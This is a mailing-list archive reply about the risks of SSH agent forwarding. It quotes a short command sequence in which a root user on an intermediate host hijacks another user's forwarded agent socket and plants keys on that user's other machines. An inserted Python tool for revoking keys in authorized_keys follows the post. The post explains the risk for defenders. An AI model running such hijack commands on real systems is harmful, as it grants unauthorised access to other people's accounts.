Full Disclosure mailing list archives
Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding
From: Raj Mathur <raju () linux-delhi org>
Date: Sat, 25 Feb 2006 00:13:02 +0530
"Andrew" == Andrew McGill <andrew2005 () ledge co za> writes:

    Andrew> Here's something you missed in the "Cons" section of agent
    Andrew> forwarding:
    Andrew>
    Andrew>   lala@local: ssh-add
    Andrew>   lala@local: (enter key)
    Andrew>   lala@local: ssh -A customer
    Andrew>   lala@customer: ssh remote
    Andrew>   lala@remote: sleep 86400
    Andrew>
    Andrew> And while you are sleeping: root@customer does this:
    Andrew>
    Andrew>   export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' | head -1`
    Andrew>   ssh-copy-id lala@remote
    Andrew>   ssh-copy-id lala@local
    Andrew>   ssh-copy-id lala@othercustomer
    Andrew>   ssh-copy-id lala@lalaland
    Andrew>
    Andrew> (Oops)
    Andrew>
    Andrew> (that's a lot easier than subverting ssh to insert something evil
    Andrew> into the stream that will hack into the remote)
    Andrew>
    Andrew> If there are untrusted machines involved you may prefer this:
    Andrew>
    Andrew>   ssh-add -c
    Andrew>
    Andrew> Note that ssh-agent does not identify the origin of requests for
    Andrew> authentication (a bug?), so its confirmation is not fail-safe.

You can also add in the Pros of using key-based authentication:

If you have multiple administrators for a server farm, grant them only
key-based authentication.  Then when an administrator leaves the company
(or is redeployed within the organisation), you only need to delete her
key from authorized_keys and she's immediately locked out of the servers.
The older method was to change the password on each server (painful) and
communicate the batch of new passwords to the remaining administrators
(insecure).

Regards,

-- Raju

--
Raj Mathur                raju () kandalaya org      http://kandalaya.org/
       GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
                      It is the mind that moves

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
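Raj's point about revoking a departed administrator by deleting her key from authorized_keys, as an added example that is not part of this thread: a small Python tool that parses OpenSSH authorized_keys entries (including the optional options field, whose quoted values may contain spaces), computes each key's SHA256 fingerprint in the form `ssh-keygen -lf` prints, and drops every entry whose fingerprint is in a revocation set, so the same key is caught even when its comment differs between hosts. The key blobs in the sample file are constructed placeholders in OpenSSH wire format, not real keys; `fake_blob`, `ALICE`, `BOB` and `SAMPLE` are invented for the demonstration.

```python
import base64
import hashlib

# Key types recognised here (OpenSSH accepts more); entries of other types are left untouched.
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com")

def split_options(line):
    """Split off the optional options field; its quoted values may contain spaces."""
    if line.split(None, 1)[0] in KEY_TYPES:
        return "", line
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_quote = not in_quote
        elif ch in " \t" and not in_quote:
            return line[:i], line[i:].lstrip()
    return line, ""

def fingerprint(blob_b64):
    """SHA256 fingerprint as ssh-keygen -lf prints it; raises on a malformed blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_entry(line):
    """Return (fingerprint, comment) for a key line; None for blanks, comments or junk."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = split_options(line)[1].split(None, 2)
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        return None
    return fingerprint(parts[1]), (parts[2] if len(parts) == 3 else "")

def revoke(text, revoked_fingerprints):
    """Drop entries whose fingerprint is revoked; return (new text, removed entries)."""
    entries = [(line, parse_entry(line)) for line in text.splitlines()]
    removed = [e for _, e in entries if e and e[0] in revoked_fingerprints]
    kept = [line for line, e in entries if not (e and e[0] in revoked_fingerprints)]
    return "\n".join(kept) + "\n", removed

def fake_blob(fill):
    """Constructed ed25519-shaped blob (length-prefixed type, 32 filler bytes); NOT a real key."""
    raw = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes([fill]) * 32
    return base64.b64encode(raw).decode()

ALICE, BOB = fake_blob(0x11), fake_blob(0x22)
SAMPLE = "\n".join([  # constructed authorized_keys; alice's key is present twice
    f'command="/usr/local/bin/ops-shell -l",no-pty ssh-ed25519 {ALICE} alice@laptop',
    f"ssh-ed25519 {BOB} bob@desktop", f"ssh-ed25519 {ALICE} alice@desktop", ""])
```

Feed `revoke` the file text and the set of fingerprints taken from the departed admin's public keys; the returned `removed` list is the audit record of what was locked out.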
Current thread:
- Tech Tip: An Illustrated Guide to SSH Agent Forwarding Steve Friedl (Feb 22)
- Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding Andrew McGill (Feb 24)
- Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding Raj Mathur (Feb 24)
- Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding Andrew McGill (Feb 24)